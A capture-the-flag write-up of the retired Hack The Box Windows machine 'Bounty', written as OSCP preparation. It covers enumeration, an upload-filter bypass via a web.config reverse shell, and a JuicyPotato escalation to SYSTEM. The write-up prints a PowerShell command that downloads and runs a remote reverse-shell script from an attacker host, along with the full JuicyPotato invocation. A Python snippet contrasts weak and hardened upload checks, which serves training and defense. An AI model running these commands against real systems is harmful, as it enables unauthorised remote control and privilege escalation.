OSCP PREPARATIONS – HTB Bounty

Bounty is a retired, deliberately vulnerable Windows machine on Hack The Box; the goal is to obtain the user and root flags by exploiting its vulnerabilities.
We start with an nmap network scan to get to know the target machine.
Classic Scan

Full port scan

As a result of the network scan, we find that only port “80/tcp http Microsoft IIS httpd 7.5” is open.
We enumerate this port.

We did not find any useful information on the web interface or in its source code, so we scan with gobuster to detect hidden files and directories.

The file and directory scan finds /aspnet_client, /transfer.aspx and /uploadedfiles.
/uploadedfiles and /aspnet_client cannot be listed (no permission).

We browse to /transfer.aspx.

We tried to upload a file here, and the .aspx extension was not allowed.

A .png file was accepted.

Let’s check whether we can access the uploaded file.

We were able to access the file we uploaded.
Now we intercept the request with Burp Suite to see which file types are accepted and whether there is a bypass. If we can somehow upload a file containing ASPX code to the web server, we can execute that code by requesting the file from the uploadedfiles directory.
I tested the ASP and ASPX extensions, but both return an “invalid file” error.
On IIS servers, .config files are important: web.config is processed by the server itself. When I tried the .config extension here it was accepted, so we look for a web.config reverse shell.
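As an added example (not code from this write-up or from the Bounty machine), the following Python models the upload filter behaviour described above: a denylist that rejects .asp/.aspx but lets web.config through, next to the allowlist check a defender would use instead. The filenames and both lists are constructed assumptions modelled on the page, not the real transfer.aspx source.

```python
"""Denylist vs allowlist upload validation, modelled on the Bounty upload form.

The write-up observes that .asp and .aspx are rejected while .png and .config
are accepted. Because IIS executes web.config as configuration, a denylist that
only names script extensions is bypassable. Both lists below are assumptions.
"""

DENYLIST = {".asp", ".aspx"}          # what transfer.aspx appears to block (assumed)
ALLOWLIST = {".png", ".jpg", ".gif"}  # image types a hardened form would allow (assumed)


def vulnerable_check(filename: str) -> bool:
    """Denylist check: rejects .asp/.aspx, accepts everything else,
    including web.config, which IIS will execute from /uploadedfiles/."""
    ext = "." + filename.lower().rsplit(".", 1)[-1] if "." in filename else ""
    return ext not in DENYLIST


def hardened_check(filename: str) -> bool:
    """Allowlist check on the normalised full name: only one extension,
    only image types, no path separators, no IIS-reserved web.config."""
    name = filename.strip().lower()
    if "/" in name or "\\" in name or name.startswith(".") or name == "web.config":
        return False
    parts = name.split(".")
    if len(parts) != 2:  # rejects shell.aspx.png, shell.png. and image.png;.aspx
        return False
    stem, ext = parts
    if not stem or not stem.replace("_", "").replace("-", "").isalnum():
        return False
    return "." + ext in ALLOWLIST


# Constructed sample filenames covering the cases the write-up walks through.
SAMPLES = ["photo.png", "shell.aspx", "shell.asp", "web.config",
           "shell.aspx.png", "shell.png.", "Photo.PNG", "../shell.png"]


def run_cases() -> dict:
    """Map each sample to (accepted_by_denylist, accepted_by_allowlist)."""
    return {f: (vulnerable_check(f), hardened_check(f)) for f in SAMPLES}


if __name__ == "__main__":
    for name, (weak, strong) in run_cases().items():
        print(f"{name:16} denylist={weak!s:5} allowlist={strong}")
```

Even with the allowlist, uploads should be stored outside the web root or in a directory where IIS has script execution disabled, so that a filter mistake does not become code execution.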

We download and modify this code.

Then we start a web server to serve Invoke-PowerShellTcp.ps1, which the target will download, and start listening with nc.

The file uploaded successfully. Before browsing to the web.config file, I start listening on the destination port with nc.

This way we get a shell on the target as the bounty\merlin user.
Here we see that the Desktop directory appears empty; we check for hidden files with the attrib command and find the user flag.

After getting the user flag, we tried to access the Administrator user’s files, but we could not because we do not have the authorization.
We perform local enumeration to find a way to escalate to root-level (SYSTEM) privileges.

Here we see that the kernel is old and that SeImpersonatePrivilege is enabled. We decide to use Rotten Potato (in its Juicy Potato form) and download it from GitHub.
Accounts running the SQL Server service or the IIS service usually have this privilege enabled by design. It is intended to allow a service to impersonate other users on the system. Juicy Potato takes advantage of the way Microsoft handles tokens to elevate local privileges to SYSTEM.
https://github.com/ohpe/juicy-potato/releases/tag/v0.1
After downloading JuicyPotato.exe from GitHub, we transfer it to the target machine.

JuicyPotato.exe requires three mandatory parameters.
We will focus on the -p parameter, the program that should give us a reverse shell. Here I create a file called shell.bat that downloads and runs Invoke-PowerShellTcp.ps1, so you should download Invoke-PowerShellTcp.ps1 and serve it from your machine.
powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.19:8000/Invoke-PowerShellTcp.ps1')"

We send this bat file to the target machine.

Now that we have transferred the shell.bat file, it is time to use JuicyPotato.exe to get our shell.
.\JuicyPotato.exe -t * -p shell.bat -l 4444 -c '{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}'
We use -t * to try both process-creation methods, -p to run shell.bat, -l to set the local port the COM server listens on (4444), and -c to supply the CLSID value for Windows Server 2008 R2 Enterprise.
We can find the CLSID value at https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2008_R2_Enterprise.

Before running this command, we start the web server on our local machine so that Invoke-PowerShellTcp.ps1 can be downloaded and run, and we listen with nc.

After running the command we get a shell as nt authority\system.

And that’s how we got the root flag.
